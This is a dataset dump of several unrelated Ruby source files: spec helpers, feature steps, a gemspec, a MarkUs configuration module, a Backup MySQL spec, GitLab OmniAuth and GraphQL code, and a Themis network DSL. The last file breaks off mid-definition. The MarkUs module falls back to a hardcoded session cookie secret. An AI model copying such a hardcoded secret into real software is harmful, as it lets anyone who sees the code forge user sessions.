hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
4a6ba53a2c045f078f6a567ba5eb7a7bce15738c | 659 | # frozen_string_literal: true
require 'simplecov'
SimpleCov.start
require 'bundler/setup'
require 'smart_parser'
require 'factory_bot'
RSpec.configure do |config|
config.include FactoryBot::Syntax::Methods
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = '.rspec_status'
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
config.before(:suite) do
FactoryBot.find_definitions
end
end
def random_ipv4
[rand(1..204), rand(10..20), rand(1..10), rand(0..255)].join('.')
end
| 21.258065 | 67 | 0.738998 |
bbd284b4633069b174d25095048542a29c863004 | 2,992 | class Spinach::Features::AwardEmoji < Spinach::FeatureSteps
include SharedAuthentication
include SharedProject
include SharedPaths
include Select2Helper
step 'I visit "Bugfix" issue page' do
visit project_issue_path(@project, @issue)
end
step 'I click the thumbsup award Emoji' do
page.within '.awards' do
thumbsup = page.first('.award-control')
thumbsup.click
thumbsup.hover
end
end
step 'I click to emoji-picker' do
page.within '.awards' do
page.find('.js-add-award').click
end
end
step 'I click to emoji in the picker' do
page.within '.emoji-menu-content' do
emoji_button = page.first('.js-emoji-btn')
emoji_button.hover
emoji_button.click
end
end
step 'I can remove it by clicking to icon' do
page.within '.awards' do
expect do
page.find('.js-emoji-btn.active').click
wait_for_requests
end.to change { page.all(".award-control.js-emoji-btn").size }.from(3).to(2)
end
end
step 'I can see the activity and food categories' do
page.within '.emoji-menu' do
expect(page).not_to have_selector 'Activity'
expect(page).not_to have_selector 'Food'
end
end
step 'I have new comment with emoji added' do
expect(page).to have_selector 'gl-emoji[data-name="smile"]'
end
step 'I have award added' do
page.within '.awards' do
expect(page).to have_selector '.js-emoji-btn'
expect(page.find('.js-emoji-btn.active .js-counter')).to have_content '1'
expect(page).to have_css(".js-emoji-btn.active[data-original-title='You']")
end
end
step 'I have no awards added' do
page.within '.awards' do
expect(page).to have_selector '.award-control.js-emoji-btn'
expect(page.all('.award-control.js-emoji-btn').size).to eq(2)
# Check tooltip data
page.all('.award-control.js-emoji-btn').each do |element|
expect(element['title']).to eq("")
end
page.all('.award-control .js-counter').each do |element|
expect(element).to have_content '0'
end
end
end
step 'project "Shop" has issue "Bugfix"' do
@project = Project.find_by(name: 'Shop')
@issue = create(:issue, title: 'Bugfix', project: project)
end
step 'I leave comment with a single emoji' do
page.within('.js-main-target-form') do
fill_in 'note[note]', with: ':smile:'
click_button 'Comment'
end
end
step 'I search "hand"' do
fill_in 'emoji-menu-search', with: 'hand'
end
step 'I see search result for "hand"' do
page.within '.emoji-menu-content' do
expect(page).to have_selector '[data-name="raised_hand"]'
end
end
step 'The emoji menu is visible' do
page.find(".emoji-menu.is-visible")
end
step 'The search field is focused' do
expect(page).to have_selector('.js-emoji-menu-search')
expect(page.evaluate_script("document.activeElement.classList.contains('js-emoji-menu-search')")).to eq(true)
end
end
| 27.703704 | 113 | 0.660094 |
7943ea1dd76fe09e8bc1f328ad7409370ffb5d53 | 129 | class ApplicationController < ActionController::API
include ActionController::HttpAuthentication::Token::ControllerMethods
end
| 32.25 | 72 | 0.860465 |
f8e758b36cf1e1795ae073392cbef34c0132a271 | 482 | # frozen_string_literal: true
require 'spec_helper'
describe Nocode::StepRegistry do
subject(:registry) { described_class.instance }
context 'when file is in the root steps folder' do
it 'returns class constant' do
expect(registry.constant!('sleep')).to eq(Nocode::Steps::Sleep)
end
end
context 'when file is in a subfolder' do
it 'returns class constant' do
expect(registry.constant!('io/read')).to eq(Nocode::Steps::Io::Read)
end
end
end
| 24.1 | 74 | 0.701245 |
1cd165ab36d5407b2f605b578dd2c9ceb0e7e3d4 | 10,268 | # ApplicationRecord mixin to configure MarkUs
# All descendants have the following methods available
module MarkusConfigurator
######################################
# Repository configuration
######################################
def markus_config_repository_admin?
if defined? IS_REPOSITORY_ADMIN
return IS_REPOSITORY_ADMIN
else
#If not defined, default to true
return true
end
end
def markus_config_repository_storage
if defined? REPOSITORY_STORAGE
return REPOSITORY_STORAGE
else
return File.join(::Rails.root.to_s, "repositories")
end
end
def markus_config_repository_hooks
if defined? REPOSITORY_HOOKS && markus_config_repository_type == 'git'
REPOSITORY_HOOKS
else
{}
end
end
def markus_config_repository_client_hooks
if defined? REPOSITORY_CLIENT_HOOKS && markus_config_repository_type == 'git'
REPOSITORY_CLIENT_HOOKS
else
''
end
end
def markus_config_pdf_conv_memory_allowance
if defined? PDF_CONV_MEMORY_ALLOWANCE
return PDF_CONV_MEMORY_ALLOWANCE
else
return 100
end
end
def markus_config_max_file_size
if defined? MAX_FILE_SIZE
return MAX_FILE_SIZE
else
return 5000000
end
end
def markus_config_repository_type
if defined? REPOSITORY_TYPE
return REPOSITORY_TYPE
else
return 'git'
end
end
def markus_config_repository_external_base_url
if defined? REPOSITORY_EXTERNAL_BASE_URL
return REPOSITORY_EXTERNAL_BASE_URL
else
return 'http://www.example.com/git'
end
end
def markus_config_repository_external_submits_only?
case markus_config_repository_type
when "svn"
if defined? REPOSITORY_EXTERNAL_SUBMITS_ONLY
retval = REPOSITORY_EXTERNAL_SUBMITS_ONLY
else
retval = false
end
else
retval = false
end
return retval
end
def markus_config_repository_permission_file
if defined? REPOSITORY_PERMISSION_FILE
return REPOSITORY_PERMISSION_FILE
else
return File.join(markus_config_repository_storage, 'git_auth')
end
end
def markus_config_course_name
if defined? COURSE_NAME
return COURSE_NAME
else
return "CSC199: Example Course Name"
end
end
def markus_config_logout_redirect
if defined? LOGOUT_REDIRECT
return LOGOUT_REDIRECT
else
return "DEFAULT"
end
end
def markus_config_remote_user_auth
if defined? REMOTE_USER_AUTH
return REMOTE_USER_AUTH
else
return false
end
end
def markus_config_validate_user_message
if defined? VALIDATE_USER_NOT_ALLOWED_DISPLAY
return VALIDATE_USER_NOT_ALLOWED_DISPLAY
else
return nil
end
end
def markus_config_validate_login_message
if defined? VALIDATE_LOGIN_INCORRECT_DISPLAY
return VALIDATE_LOGIN_INCORRECT_DISPLAY
else
return nil
end
end
###########################################
# Markus Session cookie configuration
###########################################
def markus_config_session_cookie_name
if defined? SESSION_COOKIE_NAME
return SESSION_COOKIE_NAME
else
return '_markus_session'
end
end
def markus_config_session_cookie_secret
if defined? SESSION_COOKIE_SECRET
return SESSION_COOKIE_SECRET
else
return '650d281667d8011a3a6ad6dd4b5d4f9ddbce14a7d78b107812dbb40b24e234256ab2c5572c8196cf6cde6b85942688b6bfd337ffa0daee648d04e1674cf1fdf6'
end
end
def markus_config_session_cookie_expire_after
if defined? SESSION_COOKIE_EXPIRE_AFTER
return SESSION_COOKIE_EXPIRE_AFTER
else
return 3.weeks
end
end
def markus_config_session_cookie_http_only
if defined? SESSION_COOKIE_HTTP_ONLY
return SESSION_COOKIE_HTTP_ONLY
else
return true
end
end
def markus_config_session_cookie_secure
if defined? SESSION_COOKIE_SECURE
return SESSION_COOKIE_SECURE
else
return false
end
end
######################################
# MarkusLogger configuration
######################################
def markus_config_logging_enabled?
if defined? MARKUS_LOGGING_ENABLED
return MARKUS_LOGGING_ENABLED
else
#If not defined, default to true
return true
end
end
def markus_config_validate_file
if defined? VALIDATE_FILE
return VALIDATE_FILE
else
return "#{::Rails.root.to_s}./config/dummy_validate.sh"
end
end
def markus_config_validate_ip?
if defined? VALIDATE_IP
return VALIDATE_IP
else
return false
end
end
def markus_config_logging_rotate_by_interval
if defined? MARKUS_LOGGING_ROTATE_BY_INTERVAL
return MARKUS_LOGGING_ROTATE_BY_INTERVAL
else
return false
end
end
def markus_config_logging_size_threshold
if defined? MARKUS_LOGGING_SIZE_THRESHOLD
return MARKUS_LOGGING_SIZE_THRESHOLD
else
return (1024 * 10**6)
end
end
def markus_config_logging_rotate_interval
if defined? MARKUS_LOGGING_ROTATE_INTERVAL
return MARKUS_LOGGING_ROTATE_INTERVAL
else
return 'daily'
end
end
def markus_config_logging_logfile
if defined? MARKUS_LOGGING_LOGFILE
return MARKUS_LOGGING_LOGFILE
else
return File.join(::Rails.root.to_s, "log", "#{::Rails.env}_info.log")
end
end
def markus_config_logging_errorlogfile
if defined? MARKUS_LOGGING_ERRORLOGFILE
return MARKUS_LOGGING_ERRORLOGFILE
else
return File.join(::Rails.root.to_s, "log", "#{::Rails.env}_error.log")
end
end
def markus_config_logging_num_oldfiles
if defined? MARKUS_LOGGING_OLDFILES
return MARKUS_LOGGING_OLDFILES
else
return 10
end
end
def markus_config_default_language
if defined? MARKUS_DEFAULT_LANGUAGE
return MARKUS_DEFAULT_LANGUAGE
else
return 'en'
end
end
##########################################
# Automated Testing Engine Configuration
##########################################
def autotest_on?
(defined? AUTOTEST_ON) && AUTOTEST_ON == true
end
def autotest_student_tests_on?
if autotest_on? && (defined? AUTOTEST_STUDENT_TESTS_ON)
AUTOTEST_STUDENT_TESTS_ON
else
false
end
end
def autotest_student_tests_buffer_time
if autotest_student_tests_on? && (defined? AUTOTEST_STUDENT_TESTS_BUFFER_TIME)
AUTOTEST_STUDENT_TESTS_BUFFER_TIME
else
1.hour
end
end
def autotest_client_dir
if autotest_on? && (defined? AUTOTEST_CLIENT_DIR)
AUTOTEST_CLIENT_DIR
else
File.join(::Rails.root.to_s, 'autotest')
end
end
def autotest_server_host
if autotest_on? && (defined? AUTOTEST_SERVER_HOST)
AUTOTEST_SERVER_HOST
else
'localhost'
end
end
def autotest_server_username
if autotest_on? && (defined? AUTOTEST_SERVER_USERNAME)
AUTOTEST_SERVER_USERNAME
else
nil
end
end
def autotest_server_dir
if autotest_on? && (defined? AUTOTEST_SERVER_DIR)
AUTOTEST_SERVER_DIR
else
File.join(::Rails.root.to_s, 'autotest', 'server')
end
end
def autotest_server_command
if autotest_on? && (defined? AUTOTEST_SERVER_COMMAND)
AUTOTEST_SERVER_COMMAND
else
'enqueuer'
end
end
def autotest_run_queue
if autotest_on? && (defined? AUTOTEST_RUN_QUEUE)
AUTOTEST_RUN_QUEUE
else
'autotest_run'
end
end
def autotest_cancel_queue
if autotest_on? && (defined? AUTOTEST_CANCEL_QUEUE)
AUTOTEST_CANCEL_QUEUE
else
'autotest_cancel'
end
end
def autotest_scripts_queue
if autotest_on? && (defined? AUTOTEST_SCRIPTS_QUEUE)
AUTOTEST_SCRIPTS_QUEUE
else
'autotest_scripts'
end
end
###################################################################
# Starter code configuration
###################################################################
# Global flag to enable/disable starter code feature.
def markus_starter_code_on
if defined? EXPERIMENTAL_STARTER_CODE_ON
EXPERIMENTAL_STARTER_CODE_ON
else
false
end
end
###################################################################
# Exam Plugin configuration
###################################################################
# Global flag to enable/disable all exam plugin features.
def markus_exam_plugin_on
if defined? EXPERIMENTAL_EXAM_PLUGIN_ON
EXPERIMENTAL_EXAM_PLUGIN_ON
else
false
end
end
def markus_exam_template_dir
if defined? EXAM_TEMPLATE_DIR
EXAM_TEMPLATE_DIR
else
File.join(::Rails.root.to_s, 'data', 'dev', 'exam_templates')
end
end
# Whether to allow the creation of scanned exams
def markus_experimental_scanned_exam_on?
if defined? EXPERIMENTAL_EXAM_PLUGIN_ON
EXPERIMENTAL_EXAM_PLUGIN_ON
else
false
end
end
##########################################
# Resque Configuration
##########################################
def markus_job_create_individual_groups_queue_name
if defined? JOB_CREATE_INDIVIDUAL_GROUPS_QUEUE_NAME
return JOB_CREATE_INDIVIDUAL_GROUPS_QUEUE_NAME
else
return 'job_groups'
end
end
def markus_job_collect_submissions_queue_name
if defined? JOB_COLLECT_SUBMISSIONS_QUEUE_NAME
return JOB_COLLECT_SUBMISSIONS_QUEUE_NAME
else
return 'job_collect'
end
end
def markus_job_uncollect_submissions_queue_name
if defined? JOB_UNCOLLECT_SUBMISSIONS_QUEUE_NAME
return JOB_UNCOLLECT_SUBMISSIONS_QUEUE_NAME
else
return 'job_uncollect'
end
end
def markus_job_update_repo_required_files_queue_name
if defined? JOB_UPDATE_REPO_REQUIRED_FILES_QUEUE_NAME
return JOB_UPDATE_REPO_REQUIRED_FILES_QUEUE_NAME
else
return 'job_req_files'
end
end
def markus_job_generate_queue_name
if defined? JOB_GENERATE_QUEUE_NAME
return JOB_GENERATE_QUEUE_NAME
else
return 'job_generate'
end
end
def markus_job_split_pdf_queue_name
if defined? JOB_SPLIT_PDF_QUEUE_NAME
return JOB_SPLIT_PDF_QUEUE_NAME
else
return 'job_split_pdf'
end
end
end
| 23.074157 | 143 | 0.6791 |
9181334f0fca985d5c230dd88409a024dece2431 | 1,870 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "eyowo/version"
Gem::Specification.new do |spec|
spec.name = "eyowo"
spec.version = Eyowo::VERSION
spec.authors = ["Iyanu Adelekan"]
spec.email = ["[email protected]"]
spec.summary = "Ruby client for Eyowo API."
spec.description = "The official Ruby client library for interactions with the Eyowo API."
# spec.homepage = "TODO: Put your gem's website or public repo URL here."
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "TODO: Set to 'http://mygemserver.com'"
# spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "TODO: Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "TODO: Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_dependency "httparty", "~> 0.17.0"
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
end
| 41.555556 | 96 | 0.671123 |
795d9f001207ff7bd8d521c8221251a73493c630 | 656 | # frozen_string_literal: true
name 'ama-linux-user-management'
maintainer 'AMA Team'
maintainer_email '[email protected]'
source_url 'https://github.com/ama-team/cookbook-linux-user-management'
issues_url 'https://github.com/ama-team/cookbook-linux-user-management/issues'
license 'MIT'
description 'Installs/Configures ama-linux-user-management'
long_description 'Installs/Configures ama-linux-user-management'
chef_version '>= 12', '< 14'
version '0.1.0'
depends 'ssh_authorized_keys', '~> 0.3.0'
depends 'sudo', '~> 3.5.0'
depends 'ssh', '~> 0.10.22'
depends 'ama-ssh-private-keys', '~> 0.2.0'
supports 'debian', '>= 7.3'
supports 'ubuntu', '>= 14.04'
| 31.238095 | 78 | 0.733232 |
6226985eb9234959bd5a64ab80b347bb49d490c0 | 11,646 | # encoding: utf-8
require File.expand_path('../../spec_helper.rb', __FILE__)
module Backup
describe Database::MySQL do
let(:model) { Model.new(:test_trigger, 'test label') }
let(:db) { Database::MySQL.new(model) }
let(:s) { sequence '' }
before do
Database::MySQL.any_instance.stubs(:utility).
with(:mysqldump).returns('mysqldump')
Database::MySQL.any_instance.stubs(:utility).
with(:cat).returns('cat')
end
it_behaves_like 'a class that includes Configuration::Helpers'
it_behaves_like 'a subclass of Database::Base'
describe '#initialize' do
it 'provides default values' do
expect( db.database_id ).to be_nil
expect( db.name ).to be :all
expect( db.username ).to be_nil
expect( db.password ).to be_nil
expect( db.host ).to be_nil
expect( db.port ).to be_nil
expect( db.socket ).to be_nil
expect( db.skip_tables ).to be_nil
expect( db.only_tables ).to be_nil
expect( db.additional_options ).to be_nil
end
it 'configures the database' do
db = Database::MySQL.new(model, :my_id) do |mysql|
mysql.name = 'my_name'
mysql.username = 'my_username'
mysql.password = 'my_password'
mysql.host = 'my_host'
mysql.port = 'my_port'
mysql.socket = 'my_socket'
mysql.skip_tables = 'my_skip_tables'
mysql.only_tables = 'my_only_tables'
mysql.additional_options = 'my_additional_options'
end
expect( db.database_id ).to eq 'my_id'
expect( db.name ).to eq 'my_name'
expect( db.username ).to eq 'my_username'
expect( db.password ).to eq 'my_password'
expect( db.host ).to eq 'my_host'
expect( db.port ).to eq 'my_port'
expect( db.socket ).to eq 'my_socket'
expect( db.skip_tables ).to eq 'my_skip_tables'
expect( db.only_tables ).to eq 'my_only_tables'
expect( db.additional_options ).to eq 'my_additional_options'
end
end # describe '#initialize'
describe '#perform!' do
let(:pipeline) { mock }
let(:compressor) { mock }
before do
db.stubs(:mysqldump).returns('mysqldump_command')
db.stubs(:dump_path).returns('/tmp/trigger/databases')
db.expects(:log!).in_sequence(s).with(:started)
db.expects(:prepare!).in_sequence(s)
end
context 'without a compressor' do
it 'packages the dump without compression' do
Pipeline.expects(:new).in_sequence(s).returns(pipeline)
pipeline.expects(:<<).in_sequence(s).with('mysqldump_command')
pipeline.expects(:<<).in_sequence(s).with(
"cat > '/tmp/trigger/databases/MySQL.sql'"
)
pipeline.expects(:run).in_sequence(s)
pipeline.expects(:success?).in_sequence(s).returns(true)
db.expects(:log!).in_sequence(s).with(:finished)
db.perform!
end
end # context 'without a compressor'
context 'with a compressor' do
before do
model.stubs(:compressor).returns(compressor)
compressor.stubs(:compress_with).yields('cmp_cmd', '.cmp_ext')
end
it 'packages the dump with compression' do
Pipeline.expects(:new).in_sequence(s).returns(pipeline)
pipeline.expects(:<<).in_sequence(s).with('mysqldump_command')
pipeline.expects(:<<).in_sequence(s).with('cmp_cmd')
pipeline.expects(:<<).in_sequence(s).with(
"cat > '/tmp/trigger/databases/MySQL.sql.cmp_ext'"
)
pipeline.expects(:run).in_sequence(s)
pipeline.expects(:success?).in_sequence(s).returns(true)
db.expects(:log!).in_sequence(s).with(:finished)
db.perform!
end
end # context 'without a compressor'
context 'when the pipeline fails' do
before do
Pipeline.any_instance.stubs(:success?).returns(false)
Pipeline.any_instance.stubs(:error_messages).returns('error messages')
end
it 'raises an error' do
expect do
db.perform!
end.to raise_error(Database::MySQL::Error) {|err|
expect( err.message ).to eq(
"Database::MySQL::Error: Dump Failed!\n error messages"
)
}
end
end # context 'when the pipeline fails'
end # describe '#perform!'
describe '#mysqldump' do
let(:option_methods) {%w[
credential_options connectivity_options user_options
name_option tables_to_dump tables_to_skip
]}
it 'returns full mysqldump command built from all options' do
option_methods.each {|name| db.stubs(name).returns(name) }
expect( db.send(:mysqldump) ).to eq(
"mysqldump #{ option_methods.join(' ') }"
)
end
it 'handles nil values from option methods' do
option_methods.each {|name| db.stubs(name).returns(nil) }
expect( db.send(:mysqldump) ).to eq(
"mysqldump #{ ' ' * (option_methods.count - 1) }"
)
end
end # describe '#mysqldump'
describe 'mysqldump option methods' do
describe '#credential_options' do
it 'returns the credentials arguments' do
expect( db.send(:credential_options) ).to eq ''
db.username = 'my_user'
expect( db.send(:credential_options) ).to eq(
"--user='my_user'"
)
db.password = 'my_password'
expect( db.send(:credential_options) ).to eq(
"--user='my_user' --password='my_password'"
)
db.username = nil
expect( db.send(:credential_options) ).to eq(
"--password='my_password'"
)
end
end # describe '#credential_options'
describe '#connectivity_options' do
it 'returns only the socket argument if #socket specified' do
db.host = 'my_host'
db.port = 'my_port'
db.socket = 'my_socket'
expect( db.send(:connectivity_options) ).to eq(
"--socket='my_socket'"
)
end
it 'returns host and port arguments if specified' do
expect( db.send(:connectivity_options) ).to eq ''
db.host = 'my_host'
expect( db.send(:connectivity_options) ).to eq(
"--host='my_host'"
)
db.port = 'my_port'
expect( db.send(:connectivity_options) ).to eq(
"--host='my_host' --port='my_port'"
)
db.host = nil
expect( db.send(:connectivity_options) ).to eq(
"--port='my_port'"
)
end
end # describe '#connectivity_options'
describe '#user_options' do
it 'returns arguments for any #additional_options specified' do
expect( db.send(:user_options) ).to eq ''
db.additional_options = ['--opt1', '--opt2']
expect( db.send(:user_options) ).to eq '--opt1 --opt2'
db.additional_options = '--opta --optb'
expect( db.send(:user_options) ).to eq '--opta --optb'
end
end # describe '#user_options'
describe '#name_option' do
it 'returns argument to dump all databases if name is :all' do
expect( db.send(:name_option) ).to eq '--all-databases'
end
it 'returns the database name if name is not :all' do
db.name = 'my_db'
expect( db.send(:name_option) ).to eq 'my_db'
end
end # describe '#name_option'
describe '#tables_to_dump' do
it 'returns nil if dumping all databases' do
db.only_tables = 'will be ignored'
expect( db.send(:tables_to_dump) ).to be_nil
end
it 'returns arguments for only_tables' do
db.name = 'not_all'
db.only_tables = ['one', 'two', 'three']
expect( db.send(:tables_to_dump) ).to eq 'one two three'
db.only_tables = 'four five six'
expect( db.send(:tables_to_dump) ).to eq 'four five six'
end
end # describe '#tables_to_dump'
describe '#tables_to_skip' do
specify 'when no #skip_tables are specified' do
expect( db.send(:tables_to_skip) ).to eq ''
end
context 'when dumping all databases' do
it 'returns arguments for all tables given, as given' do
db.skip_tables = ['my_db.my_table', 'foo']
# Note that mysqldump will exit(1) if these don't include the db name.
expect( db.send(:tables_to_skip) ).to eq(
"--ignore-table='my_db.my_table' --ignore-table='foo'"
)
end
end
context 'when a database name is specified' do
it 'will add the database name prefix if missing' do
db.name = 'my_db'
db.skip_tables = ['my_table', 'foo.bar']
expect( db.send(:tables_to_skip) ).to eq(
"--ignore-table='my_db.my_table' --ignore-table='foo.bar'"
)
end
end
end # describe '#tables_to_skip'
end # describe 'mysqldump option methods'
describe 'deprecations' do
describe '#utility_path' do
before do
# to satisfy Utilities.configure
File.stubs(:executable?).with('/foo').returns(true)
Logger.expects(:warn).with {|err|
expect( err ).to be_an_instance_of Configuration::Error
expect( err.message ).to match(
/Use Backup::Utilities\.configure instead/
)
}
end
after do
Database::MySQL.clear_defaults!
end
context 'when set directly' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.new(model) do |db|
db.utility_path = '/foo'
end
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
context 'when set as a default' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.defaults do |db|
db.utility_path = '/foo'
end
Database::MySQL.new(model)
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
end # describe '#utility_path'
describe '#mysqldump_utility' do
before do
# to satisfy Utilities.configure
File.stubs(:executable?).with('/foo').returns(true)
Logger.expects(:warn).with {|err|
expect( err ).to be_an_instance_of Configuration::Error
expect( err.message ).to match(
/Use Backup::Utilities\.configure instead/
)
}
end
after do
Database::MySQL.clear_defaults!
end
context 'when set directly' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.new(model) do |db|
db.mysqldump_utility = '/foo'
end
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
context 'when set as a default' do
it 'should issue a deprecation warning and set the replacement value' do
Database::MySQL.defaults do |db|
db.mysqldump_utility = '/foo'
end
Database::MySQL.new(model)
# must check directly, since utility() calls are stubbed
expect( Utilities::UTILITY['mysqldump'] ).to eq '/foo'
end
end
end # describe '#mysqldump_utility'
end # describe 'deprecations'
end
end
| 32.260388 | 80 | 0.593509 |
4a719ebdbd61d98695f57f591cf71722a2b20bd2 | 4,894 | class OmniauthCallbacksController < Devise::OmniauthCallbacksController
include AuthenticatesWithTwoFactor
protect_from_forgery except: [:kerberos, :saml, :cas3]
Gitlab.config.omniauth.providers.each do |provider|
define_method provider['name'] do
handle_omniauth
end
end
# Extend the standard message generation to accept our custom exception
def failure_message
exception = env["omniauth.error"]
error = exception.error_reason if exception.respond_to?(:error_reason)
error ||= exception.error if exception.respond_to?(:error)
error ||= exception.message if exception.respond_to?(:message)
error ||= env["omniauth.error.type"].to_s
error.to_s.humanize if error
end
# We only find ourselves here
# if the authentication to LDAP was successful.
def ldap
ldap_user = Gitlab::LDAP::User.new(oauth)
ldap_user.save if ldap_user.changed? # will also save new users
@user = ldap_user.gl_user
@user.remember_me = params[:remember_me] if ldap_user.persisted?
# Do additional LDAP checks for the user filter and EE features
if ldap_user.allowed?
if @user.two_factor_enabled?
prompt_for_two_factor(@user)
else
log_audit_event(@user, with: :ldap)
sign_in_and_redirect(@user)
end
else
flash[:alert] = "Access denied for your LDAP account."
redirect_to new_user_session_path
end
end
def saml
if current_user
log_audit_event(current_user, with: :saml)
# Update SAML identity if data has changed.
identity = current_user.identities.find_by(extern_uid: oauth['uid'], provider: :saml)
if identity.nil?
current_user.identities.create(extern_uid: oauth['uid'], provider: :saml)
redirect_to profile_account_path, notice: 'Authentication method updated'
else
redirect_to after_sign_in_path_for(current_user)
end
else
saml_user = Gitlab::Saml::User.new(oauth)
saml_user.save if saml_user.changed?
@user = saml_user.gl_user
continue_login_process
end
rescue Gitlab::OAuth::SignupDisabledError
handle_signup_error
end
def omniauth_error
@provider = params[:provider]
@error = params[:error]
render 'errors/omniauth_error', layout: "errors", status: 422
end
def cas3
ticket = params['ticket']
if ticket
handle_service_ticket oauth['provider'], ticket
end
handle_omniauth
end
def kerberos_spnego
# The internal kerberos_spnego provider is a replacement for
# omniauth-kerberos. Here we re-use the 'kerberos' provider name to ease
# the transition. In time (in GitLab 9.0?) we should remove the
# omniauth-kerberos gem and rename the internal 'kerberos_spnego'
# provider to plain 'kerberos' and remove this special method.
oauth['provider'] = 'kerberos'
handle_omniauth
end
def authentiq
if params['sid']
handle_service_ticket oauth['provider'], params['sid']
end
handle_omniauth
end
private
def handle_omniauth
if current_user
# Add new authentication method
current_user.identities.find_or_create_by(extern_uid: oauth['uid'], provider: oauth['provider'])
log_audit_event(current_user, with: oauth['provider'])
redirect_to profile_account_path, notice: 'Authentication method updated'
else
oauth_user = Gitlab::OAuth::User.new(oauth)
oauth_user.save
@user = oauth_user.gl_user
continue_login_process
end
rescue Gitlab::OAuth::SignupDisabledError
handle_signup_error
end
def handle_service_ticket(provider, ticket)
Gitlab::OAuth::Session.create provider, ticket
session[:service_tickets] ||= {}
session[:service_tickets][provider] = ticket
end
def continue_login_process
# Only allow properly saved users to login.
if @user.persisted? && @user.valid?
log_audit_event(@user, with: oauth['provider'])
if @user.two_factor_enabled?
prompt_for_two_factor(@user)
else
sign_in_and_redirect(@user)
end
else
error_message = @user.errors.full_messages.to_sentence
return redirect_to omniauth_error_path(oauth['provider'], error: error_message)
end
end
def handle_signup_error
label = Gitlab::OAuth::Provider.label_for(oauth['provider'])
message = "Signing in using your #{label} account without a pre-existing GitLab account is not allowed."
if current_application_settings.signup_enabled?
message << " Create a GitLab account first, and then connect it to your #{label} account."
end
flash[:notice] = message
redirect_to new_user_session_path
end
def oauth
@oauth ||= request.env['omniauth.auth']
end
def log_audit_event(user, options = {})
AuditEventService.new(user, user, options).
for_authentication.security_event
end
end
| 30.209877 | 108 | 0.706171 |
e83da830935722dc388af3116d889639257359e1 | 1,754 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Toggling the resolve status of a discussion' do
include GraphqlHelpers
let_it_be(:project) { create(:project, :public, :repository) }
let_it_be(:noteable) { create(:merge_request, source_project: project) }
let(:discussion) do
create(:diff_note_on_merge_request, noteable: noteable, project: project).to_discussion
end
let(:mutation) do
graphql_mutation(:discussion_toggle_resolve, { id: discussion.to_global_id.to_s, resolve: true })
end
let(:mutation_response) { graphql_mutation_response(:discussion_toggle_resolve) }
context 'when the user does not have permission' do
let_it_be(:current_user) { create(:user) }
it_behaves_like 'a mutation that returns top-level errors',
errors: ["The resource that you are attempting to access does not exist or you don't have permission to perform this action"]
end
context 'when user has permission' do
let_it_be(:current_user) { create(:user, developer_projects: [project]) }
it 'returns the discussion without errors', :aggregate_failures do
post_graphql_mutation(mutation, current_user: current_user)
expect(response).to have_gitlab_http_status(:success)
expect(mutation_response).to include(
'discussion' => be_present,
'errors' => be_empty
)
end
context 'when an error is encountered' do
before do
allow_next_instance_of(::Discussions::ResolveService) do |service|
allow(service).to receive(:execute).and_raise(ActiveRecord::RecordNotSaved)
end
end
it_behaves_like 'a mutation that returns errors in the response',
errors: ['Discussion failed to be resolved']
end
end
end
| 35.08 | 131 | 0.7252 |
08b1f31b3c7a64acbcf1747133fdc2a1a1357a37 | 237 | class CreateComments < ActiveRecord::Migration[5.2]
def change
create_table :comments do |t|
t.text :content
t.belongs_to :user, index: true
t.belongs_to :gossip, index: true
t.timestamps
end
end
end
| 19.75 | 51 | 0.658228 |
1c53cee7611e1c92390e39546d3572491244ad34 | 199 | class CreateTags < ActiveRecord::Migration[5.1]
def change
create_table :tags do |t|
t.string :name
t.references :blog_post, foreign_key: true
t.timestamps
end
end
end
| 18.090909 | 48 | 0.663317 |
e99a9bc41fd325c52449db94303ca0e70625d2b1 | 1,165 | require 'ip'
require './lib/configuration/team'
module Themis
module Configuration
def self.network(&block)
network_dsl = NetworkDSL.new
network_dsl.instance_eval &block
@_network = network_dsl.network
end
def self.get_network
@_network
end
class Network
attr_accessor :internal, :other
def initialize
@internal = []
@other = []
end
end
class NetworkDSL
attr_reader :network
def initialize
@network = Network.new
end
def internal(*ip_addresses)
ip_addresses.each do |ip_addr_str|
ip_addr = IP.new ip_addr_str
@network.internal << ip_addr
end
end
def other(*ip_addresses)
ip_addresses.each do |ip_addr_str|
ip_addr = IP.new ip_addr_str
@network.other << ip_addr
end
end
end
protected
@_network = nil
end
end
| 22.403846 | 50 | 0.482403 |
5d347439e63f9d5d53df4845a099cfd5c1615788 | 899 | module Anemone
module Queue
NEW = 0
PROCESSED = 1
def self.included(base)
base.extend Anemone::Queue::ClassMethods
base.send(:include, Anemone::Queue::InstanceMethods)
base.send :field, :state, :Integer, :default => NEW
